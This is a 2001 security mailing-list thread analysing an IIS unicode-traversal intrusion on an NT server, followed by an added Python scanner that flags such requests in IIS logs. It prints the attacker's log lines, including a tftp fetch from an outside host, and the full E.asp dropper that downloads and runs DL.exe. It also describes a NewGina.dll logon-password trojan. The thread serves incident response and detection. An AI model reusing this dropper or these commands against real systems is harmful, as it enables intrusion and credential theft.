Security Incidents mailing list archives
Re: Some details in a recent NT hack we encountered
From: Ron Grove <rgrove () HOTMAIL COM>
Date: Sun, 25 Feb 2001 22:21:11 -0700
I sent an update after this posting that explains what we found on that after some more investigation. I have appended it below your message.

In short, the log was created by a trojan called NewGina.dll. We knew it had to be created by something that was associated with logons, so msgina.dll (or in our case awgina.dll) was a good place to start. Searching for "gina" turned up "NewGina.dll", which immediately explained what was going on and was what was creating the logs (to answer that question). Some redirection in the registry was how the intercept was pulled off.

We suspect a kit, because everything about the break-in appeared to lack skill or polish. Easy to catch quickly and didn't clean anything up. With the access he had one would expect better... They used the unicode thing to load dl.exe and company. I don't know exactly where he got SYSTEM access, but I expect somehow through dl.exe? If anyone wants it, it's all theirs of course.

Ron

I have CC:'d you because I don't know how long before this actually gets posted. The moderator appears to be (very understandably) less aggressive on Friday afternoons and weekends. :-) You wouldn't have seen it until Monday if it were me at the helm...
From: Gossi The Dog <gossi () OWNED LAB6 COM>
Reply-To: Gossi The Dog <gossi () OWNED LAB6 COM>
To: INCIDENTS () SECURITYFOCUS COM
Subject: Re: Some details in a recent NT hack we encountered
Date: Wed, 28 Feb 2001 21:48:23 +0000

On Sat, 24 Feb 2001, Ron Grove wrote:

> Hello,
>
> Just wanted to share some of the footprints of a hack that we had on a

<snip>

Ok, three points here.

First off, the IIS unicode exploit does not give you SYSTEM or Administrator privs. So how are they getting those (they'll need them to make those dirs and set permissions etc)?

Secondly, what program is generating those WinLogon logs? Not seen that before at all, very interesting.

Thirdly, could this be a worm? If it is, erm, eek.

Regards,
Gossi.
Just wanted to share some of the footprints of a hack that we had on one of our NT servers. This is not everything, I am sure. It was too important to rebuild and secure the server for the users' usage again. If anyone else has noticed this please let me know. We are curious what else was put on the machine beyond what we found. Attempts were made against other servers as well.

Config:
Windows NT 4.0 with SP6a
Runs Exchange 5.5 SP4, IIS 4.0, MS Proxy Server 2.0

Initially noticed logfile problem with UNICODE exploit. Then noticed os2srv.exe running in taskmanager and as a service. os2srv.exe was then killed and sud.exe appeared out of nowhere in processes. Can't find sud.exe so find is possibly trojaned. They initially got in with the UNICODE exploit from a few months back.

Here is the snip from the logs:

xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:28, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 234, 140, 1650, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir+c:\,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:54, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 188, 141, 379, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe, E.asp+-r,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:20, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 16, 142, 396, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+del+E.asp,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:26, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 2265, 163, 415, 502, 0, GET, /scripts/../../winnt/system32/tftp.exe, -i+rooted.ntserver.com+get+E.asp,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:34, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 1781, 101, 225, 200, 0, GET, /scripts/E.asp, -,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:37, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 15, 196, 355, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe, E.asp+-r,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:41, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 15, 197, 355, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+del+E.asp,

We contacted the source IP, who had been contacted by another attacked site.
A CERT report was already generated by the other party.

The text of E.asp is:

<%
Set fs = CreateObject("Scripting.FileSystemObject")
Set drv = fs.Drives
dmax = ""
dmac = 0
For each d in drv
  If d.Driveletter <> "A" And d.IsReady Then
    If d.AvailableSpace > dmac then
      dmac = d.AvailableSpace
      dmab = d.DriveType
      dmaa = d.TotalSize
      dmad = d.SerialNumber
      dmax = d.DriveLetter
    End If
  End If
Next
filename = server.mappath("dl.bat")
Set tf = fs.CreateTextFile(filename, True)
tf.WriteLine("@echo off")
tf.WriteLine("cd \Inetpub\scripts")
tf.WriteLine("startDL:")
tf.WriteLine("tftp.exe -i 216.205.125.115 get DL.exe")
tf.WriteLine("if not exist DL.exe goto startDL")
tf.WriteLine("start /w DL.exe")
tf.WriteLine("ren 00.D install.bat")
tf.WriteLine("attrib TFTP* -r")
tf.WriteLine("attrib DL.exe -r")
tf.WriteLine("del TFTP*")
tf.WriteLine("del DL.exe")
tf.WriteLine("install.bat %1")
tf.WriteLine("exit")
tf.Close
dim command
dim wshShell
command = server.mappath("dl.bat") & " " & dmax
On Error Resume Next
Set wshShell = CreateObject("WScript.Shell")
wshShell.Run (command)
If Err Then
  Set objFSO = Server.CreateObject("scripting.filesystemobject")
  pathname = server.mappath("dl.bat")
  objFSO.DeleteFile pathname
  Set objFSO = Nothing
Else
  Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" & dmad
End If
%>
----------------------------

This file downloads DL.exe from the remote host, executes it (which uncompresses a group of files), then runs an install.
A directory listing follows:
-----------------------------
09/24/1997  12:06a         1,942 environ.ksh
09/24/1997  12:06a         1,323 profile.ksh
02/20/2001  04:52p         1,289 E.asp
02/20/2001  05:11p         5,120 DL.exe
02/20/2001  05:12p         2,201 00.D
02/20/2001  05:12p            64 01.D
02/20/2001  05:12p        32,256 02.D
02/20/2001  05:12p           344 03.D
02/20/2001  05:12p       349,696 04.D
02/20/2001  05:12p        28,672 05.D
02/20/2001  05:12p        24,576 06.D
02/20/2001  05:12p        70,211 07.D
02/20/2001  05:12p        18,276 08.D
02/20/2001  05:12p        28,432 09.D
02/20/2001  05:12p        35,981 10.D
02/20/2001  05:12p       427,520 11.D
02/20/2001  05:12p        12,288 12.D
02/20/2001  05:12p         6,867 13.D

00.D gets renamed to install.bat, then executed.

A new directory also appears about this time. It is found on a different drive (in our case E:\ since D:\ was the CDROM). It is under a new directory called E:\Adminback0801\root\system\dll and nothing is in it.

In the C:\Winnt\System32\os2\ directory a new hidden folder called "New" was present. It contained:
FireDaemon.exe
dir.txt
login.txt
RemScan.txt
SUD.exe
SUD.bak

Its security was set to SYSTEM Full Access.

FireDaemon was used to create an INDEX service and an OS2SRV service.

A trojan .dll was placed in C:\Winnt\System32 called NewGina.dll. HKLM/Software/Windows NT/Software/Winlogon/NewGina key was created with the path to the NewGina trojan. A key called OriginalGinaDll was created with pcAnywhere's awgina.dll entry.

NewGina.dll creates a .tmp file on C:\ that captures logon passwords. It is appended to with the current password after every logon so that changed passwords are also caught. The file is formatted and produced by the NewGina.dll and contains the following text:

WlxNegotiate.
WlxInitialize.
WlxDisplaySASNotice.
WlxLoggedOutSAS, SasType=1.
WlxDisplaySASNotice.
WlxDisplaySASNotice.
WlxLoggedOutSAS, SasType=1.
user Administrator has logged on to domain OURSERVER with password CURRENT_ADMIN_PASSWORD.
user is a member of the Administrators group.
returned profile information:
type 2
profile path: (null)
policy path: \\OURSERVER\netlogon\ntconfig.pol
server: \\OURSERVER
LOGONSERVER=\\OURSERVER
WlxActivateUserShell.
WlxLoggedOnSAS, SasType=1.
WlxDisplayLockedNotice.
WlxWkstaLockedSAS, SasType=1.
WlxLoggedOnSAS, SasType=1.
WlxDisplayLockedNotice.
WlxIsLockOk.
WlxDisplayLockedNotice.
WlxIsLockOk.
WlxDisplayLockedNotice.
WlxWkstaLockedSAS, SasType=1.
WlxLoggedOnSAS, SasType=1.
WlxDisplayLockedNotice.
WlxIsLockOk.
WlxDisplayLockedNotice.
WlxWkstaLockedSAS, SasType=1.
WlxLoggedOnSAS, SasType=1.

A new ftp server is also installed called UServ or something like that (I forget right now).

Too much to try to clean so rebuilding and securing is probably the best route. Hope this helps someone.

Thanks,
Ron
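The IIS log excerpt in Ron's post is the earliest artefact of the intrusion: traversal out of /scripts into winnt\system32, cmd.exe and attrib.exe driven over HTTP, a tftp fetch of E.asp, and then a 200 for /scripts/E.asp itself. The following scanner is an added example and is not code from the thread or from any of its posters. It parses the comma-separated "Microsoft IIS Log Format" that IIS 4 wrote (15 fields per record, trailing comma), flags those patterns, and links the tftp "get" to the later execution of the fetched file. The sample log is constructed after the posted lines, with the masked addresses replaced by TEST-NET documentation addresses (192.0.2.10 and 198.51.100.5) and one benign request added; the field names and the encoded traversal forms in the regex (IIS logs the decoded path, as in the post, but other loggers may keep the raw URL) are my assumptions, not anything the thread states.

```python
import re
from dataclasses import dataclass

# Field order of the comma-separated "Microsoft IIS Log Format" (IIS 4).
# Assumed layout for this example; the posted lines fit it.
FIELDS = [
    "client_ip", "user", "date", "time", "service", "server", "server_ip",
    "time_taken_ms", "bytes_recv", "bytes_sent", "status", "win32_status",
    "method", "target", "params",
]

# Constructed sample modelled on the post; addresses are documentation ranges.
SAMPLE_LOG = r"""
192.0.2.10, -, 2/15/01, 20:41:28, W3SVC1, OURSERVER, 198.51.100.5, 234, 140, 1650, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir+c:\,
192.0.2.10, -, 2/15/01, 20:41:54, W3SVC1, OURSERVER, 198.51.100.5, 188, 141, 379, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe, E.asp+-r,
192.0.2.10, -, 2/15/01, 20:42:20, W3SVC1, OURSERVER, 198.51.100.5, 16, 142, 396, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+del+E.asp,
192.0.2.10, -, 2/15/01, 20:42:26, W3SVC1, OURSERVER, 198.51.100.5, 2265, 163, 415, 502, 0, GET, /scripts/../../winnt/system32/tftp.exe, -i+rooted.ntserver.com+get+E.asp,
192.0.2.10, -, 2/15/01, 20:42:34, W3SVC1, OURSERVER, 198.51.100.5, 1781, 101, 225, 200, 0, GET, /scripts/E.asp, -,
192.0.2.10, -, 2/15/01, 20:42:37, W3SVC1, OURSERVER, 198.51.100.5, 15, 196, 355, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe, E.asp+-r,
192.0.2.10, -, 2/15/01, 20:42:41, W3SVC1, OURSERVER, 198.51.100.5, 15, 197, 355, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+del+E.asp,
198.51.100.20, -, 2/15/01, 20:43:02, W3SVC1, OURSERVER, 198.51.100.5, 12, 90, 4210, 200, 0, GET, /default.htm, -,
"""

# Decoded "..", URL-encoded "..", and the overlong UTF-8 forms (MS00-078) in case
# the logger records the raw request instead of the decoded path.
TRAVERSAL = re.compile(r"\.\.[/\\]|%2e%2e|%c0%af|%c1%9c", re.IGNORECASE)
# System tools that have no business being the target of a web request.
SYSTEM32_TOOLS = {"cmd.exe", "tftp.exe", "attrib.exe"}


@dataclass
class Finding:
    time: str
    client_ip: str
    target: str
    params: str
    reasons: list


def parse_record(line):
    """Split one record into a dict; None for blank or malformed lines."""
    line = line.strip()
    if not line:
        return None
    parts = line.rstrip(",").split(", ")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def basename(target):
    """Last path component of the request target, lower-cased."""
    return target.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(rec, fetched):
    """Return the reasons a record is suspicious; empty list means benign.
    `fetched` accumulates file names seen as tftp 'get' targets so that a
    later request for that file can be tied back to the download."""
    reasons = []
    name = basename(rec["target"])
    if TRAVERSAL.search(rec["target"]):
        reasons.append("directory traversal in request path")
    if name in SYSTEM32_TOOLS:
        reasons.append(f"web request executes {name}")
    if name == "tftp.exe":
        argv = rec["params"].split("+")
        if "get" in argv:
            i = argv.index("get")
            if i + 1 < len(argv):
                fetched.add(argv[i + 1].lower())
                reasons.append(f"tftp fetch of {argv[i + 1]}")
    if name in fetched and rec["status"] == "200":
        reasons.append(f"fetched file {name} executed via web server")
    return reasons


def scan(log_text):
    """Scan a whole log and return Findings in log order."""
    fetched, findings = set(), []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        reasons = classify(rec, fetched)
        if reasons:
            findings.append(Finding(rec["time"], rec["client_ip"],
                                    rec["target"], rec["params"], reasons))
    return findings


def summarize(findings):
    """Per client: request count, tools driven, first and last hit time."""
    per_client = {}
    for f in findings:
        e = per_client.setdefault(f.client_ip, {"requests": 0, "tools": set(),
                                                "first": f.time, "last": f.time})
        e["requests"] += 1
        e["last"] = f.time
        if basename(f.target) in SYSTEM32_TOOLS:
            e["tools"].add(basename(f.target))
    return per_client


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f.time} {f.client_ip} {f.target} {f.params}")
        for r in f.reasons:
            print("    -", r)
    print(summarize(results))
```

Run against the sample, it reports all seven attacker requests and nothing for the benign one, and the summary gives the single client that drove cmd.exe, attrib.exe and tftp.exe over roughly a minute. The tftp-then-execute link is the useful part: a 200 for a script in /scripts is unremarkable on its own, but a 200 for a file that the same log shows arriving by tftp a few seconds earlier is the moment the dropper ran.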
Current thread:
- Some details in a recent NT hack we encountered Ron Grove (Feb 24)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 24)
- <Possible follow-ups>
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
- Re: Some details in a recent NT hack we encountered Ron Grove (Feb 25)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 27)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 28)